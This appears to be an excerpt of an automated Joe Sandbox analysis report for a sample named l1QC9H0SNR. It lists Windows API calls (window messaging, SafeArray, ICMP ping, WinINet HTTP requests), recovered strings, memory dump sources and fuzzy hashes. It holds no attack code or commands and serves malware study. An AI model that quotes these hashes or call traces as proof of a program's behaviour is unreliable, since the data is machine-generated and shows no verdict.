                                              • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB25D9
                                              • Sleep.KERNEL32(000001F4), ref: 00BB25EB
                                              • GetMenuItemCount.USER32(?), ref: 00BB262F
                                              • GetMenuItemID.USER32(?,00000000), ref: 00BB264B
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00BB2675
                                              • GetMenuItemID.USER32(?,?), ref: 00BB26BA
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BB2700
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2714
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2735
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
                                              • Instruction ID: 3dee1b787c799db79a7ba2e9c1b675e3a956179ba104286d07b894d610e369ad
                                              • Opcode Fuzzy Hash: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
                                              • Instruction Fuzzy Hash: A0618D7090024AAFDF21CF64DC98EFEBBF8EB45308F144599E842A7251DBB1AD05DB21
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BD6FA5
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BD6FA8
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BD6FCC
                                              • _memset.LIBCMT ref: 00BD6FDD
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BD6FEF
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BD7067
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                              • Instruction ID: c7d36b6eb51e5c8602c5d572ff233c49ce0c7f4089db78496b41c8131c1dd829
                                              • Opcode Fuzzy Hash: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                              • Instruction Fuzzy Hash: 86616D75940208AFDB11DFA4CC81FEEB7F8EB49710F14419AFA14AB3A1E771A941DB90
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BA6BBF
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00BA6C18
                                              • VariantInit.OLEAUT32(?), ref: 00BA6C2A
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BA6C4A
                                              • VariantCopy.OLEAUT32(?,?), ref: 00BA6C9D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BA6CB1
                                              • VariantClear.OLEAUT32(?), ref: 00BA6CC6
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00BA6CD3
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CDC
                                              • VariantClear.OLEAUT32(?), ref: 00BA6CEE
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                              • Instruction ID: 4b845bba5bad86115ddc61230d6f8a5b29c64b39d8dde6f097707dfd42d868d8
                                              • Opcode Fuzzy Hash: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                              • Instruction Fuzzy Hash: 37413F75A04219EFCF00DF68D8549AEBBF9EF09354F0480A9E956E7361DB30A945CFA0
                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 00BC5793
                                              • inet_addr.WS2_32(?), ref: 00BC57D8
                                              • gethostbyname.WS2_32(?), ref: 00BC57E4
                                              • IcmpCreateFile.IPHLPAPI ref: 00BC57F2
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5862
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5878
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BC58ED
                                              • WSACleanup.WS2_32 ref: 00BC58F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: 6d94967184ac94953e1e58adc0369c91e53942405ce13dd71ec7f38e4baf2cf3
                                              • Instruction ID: 4c1018e77bf952599008184b5cad816df8191ce769f7bf3280969b9c4e38f2d5
                                              • Opcode Fuzzy Hash: 6d94967184ac94953e1e58adc0369c91e53942405ce13dd71ec7f38e4baf2cf3
                                              • Instruction Fuzzy Hash: 46516F316047019FDB209F24DC95F6AB7E4EF48710F0485AAF996DB2A1DB70E844DB51
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBB4D0
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BBB546
                                              • GetLastError.KERNEL32 ref: 00BBB550
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00BBB5BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 682ef9b26280c19b5901e0164e83ff801582bce68743a8d2c8f41a509aaf96ff
                                              • Instruction ID: 2efe9442d699f94626e00bcf5335622845079d8dc4c51f322de4c7b04731d85c
                                              • Opcode Fuzzy Hash: 682ef9b26280c19b5901e0164e83ff801582bce68743a8d2c8f41a509aaf96ff
                                              • Instruction Fuzzy Hash: 1E316F75A00209DBCB20EB68CCA5FFDB7F4EF14311F1441A6E90597291DBF09A45CB52
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00BA9014
                                              • GetDlgCtrlID.USER32 ref: 00BA901F
                                              • GetParent.USER32 ref: 00BA903B
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA903E
                                              • GetDlgCtrlID.USER32(?), ref: 00BA9047
                                              • GetParent.USER32(?), ref: 00BA9063
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA9066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 9368534811273819b0ca38611a47153d20929dbdcb8fb585bb8d5c950b194e6a
                                              • Instruction ID: 74143a514924df24d5b739906977eca92bd739069cda8c36cac6b25accbe0439
                                              • Opcode Fuzzy Hash: 9368534811273819b0ca38611a47153d20929dbdcb8fb585bb8d5c950b194e6a
                                              • Instruction Fuzzy Hash: E9210870A04105BFDF15ABA0CC95EFEB7B4EF49310F0041A6B912972F1DF359818DA20
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00BA90FD
                                              • GetDlgCtrlID.USER32 ref: 00BA9108
                                              • GetParent.USER32 ref: 00BA9124
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA9127
                                              • GetDlgCtrlID.USER32(?), ref: 00BA9130
                                              • GetParent.USER32(?), ref: 00BA914C
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA914F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 58c38e3b94a2c566ea4e6c94c77fc72febcd95f984abba9b267ab774380d47e0
                                              • Instruction ID: d1240ed463ae7a76c0257a659d7c53319cc12bdd524e845f26391371c5fbffc7
                                              • Opcode Fuzzy Hash: 58c38e3b94a2c566ea4e6c94c77fc72febcd95f984abba9b267ab774380d47e0
                                              • Instruction Fuzzy Hash: 1E21F574A04109BBDF15ABA0CC95EFEBBF4EF49300F0041A6B911A72E1EB759819DB20
                                              APIs
                                              • GetParent.USER32 ref: 00BA916F
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00BA9184
                                              • _wcscmp.LIBCMT ref: 00BA9196
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BA9211
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-3381328864
                                              • Opcode ID: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
                                              • Instruction ID: b8e42bb1a85ca20b1b51664281d1897e1ded1e9cbe8bdc0f1732197871014d32
                                              • Opcode Fuzzy Hash: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
                                              • Instruction Fuzzy Hash: 8111593664C307BAFA182624EC0BEB777DCDB12720B2001A7F914E14D1FE616C51A990
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BC88D7
                                              • CoInitialize.OLE32(00000000), ref: 00BC8904
                                              • CoUninitialize.COMBASE ref: 00BC890E
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00BC8A0E
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BC8B3B
                                              • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00BE2C0C), ref: 00BC8B6F
                                              • CoGetObject.OLE32(?,00000000,00BE2C0C,?), ref: 00BC8B92
                                              • SetErrorMode.KERNEL32(00000000), ref: 00BC8BA5
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BC8C25
                                              • VariantClear.OLEAUT32(?), ref: 00BC8C35
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: ccc1c9b85c7ea48ccbf364a58e3c086966ad9de36a241899a4d8d72e4f54b989
                                              • Instruction ID: 0c9f5600a5026fb0333dcc300edae783c04e64e71ba1fddc3c76e671b864786e
                                              • Opcode Fuzzy Hash: ccc1c9b85c7ea48ccbf364a58e3c086966ad9de36a241899a4d8d72e4f54b989
                                              • Instruction Fuzzy Hash: 89C1F2B1608305AFD700DF64C884E2AB7E9EF89748F04499DF98A9B261DB71ED05CB52
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00BB7A6C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ArraySafeVartype
                                              • String ID:
                                              • API String ID: 1725837607-0
                                              • Opcode ID: 1b28845ebb6005346a347d9440683b472ad38316f2a7969fef85f3f0eb80723c
                                              • Instruction ID: 09be4dc35d9350e02e55fd3475957bd547748a19fd82967d936e305294226c9f
                                              • Opcode Fuzzy Hash: 1b28845ebb6005346a347d9440683b472ad38316f2a7969fef85f3f0eb80723c
                                              • Instruction Fuzzy Hash: 2AB1927194821A9FDB10DFA4C894BFEBBF4EF89321F1044A9E551E7241DBB4E941CB90
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B5FAA6
                                              • OleUninitialize.OLE32(?,00000000), ref: 00B5FB45
                                              • UnregisterHotKey.USER32(?), ref: 00B5FC9C
                                              • DestroyWindow.USER32(?), ref: 00B945D6
                                              • FreeLibrary.KERNEL32(?), ref: 00B9463B
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B94668
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: cf8ca4653f1826595dec74ed47651c17e4a4e4597592fa5dce12d522677f2966
                                              • Instruction ID: c7d8b311f7cfc0b7370d8016466974a411a450a9a78f152c33658022478b1595
                                              • Opcode Fuzzy Hash: cf8ca4653f1826595dec74ed47651c17e4a4e4597592fa5dce12d522677f2966
                                              • Instruction Fuzzy Hash: BDA11370602212CFCB29EB14C9A5B79F7E4EF05711F5542F9E90AAB261DB30AD1ACF50
                                              APIs
                                              • EnumChildWindows.USER32(?,00BAA439), ref: 00BAA377
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: dd94dac71769379cfa4e857308ec0b53b3873cf81b8797985b5142ae334c4b87
                                              • Instruction ID: 704a870bc162f1a3e23f78378d77a0c281f4499fb4bf00646a45721f7e5dcbb5
                                              • Opcode Fuzzy Hash: dd94dac71769379cfa4e857308ec0b53b3873cf81b8797985b5142ae334c4b87
                                              • Instruction Fuzzy Hash: CE91A470A08605EACF18EFA0C482BEDFBE4FF16300F548199D859A7191DF316999DBB1
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00B52EAE
                                                • Part of subcall function 00B51DB3: GetClientRect.USER32(?,?), ref: 00B51DDC
                                                • Part of subcall function 00B51DB3: GetWindowRect.USER32(?,?), ref: 00B51E1D
                                                • Part of subcall function 00B51DB3: ScreenToClient.USER32(?,?), ref: 00B51E45
                                              • GetDC.USER32 ref: 00B8CD32
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B8CD45
                                              • SelectObject.GDI32(00000000,00000000), ref: 00B8CD53
                                              • SelectObject.GDI32(00000000,00000000), ref: 00B8CD68
                                              • ReleaseDC.USER32(?,00000000), ref: 00B8CD70
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B8CDFB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                              • Instruction ID: 2b8883bc735583d9af9a3567b4e49f3482f09d609e2b949d16a0e72916b0bba5
                                              • Opcode Fuzzy Hash: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                              • Instruction Fuzzy Hash: 6971BC71800205DFCF21AF64C881AAA7FF5FF49321F1482FAED595A2A6D7309845DFA0
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC1A50
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BC1A7C
                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BC1ABE
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BC1AD3
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1AE0
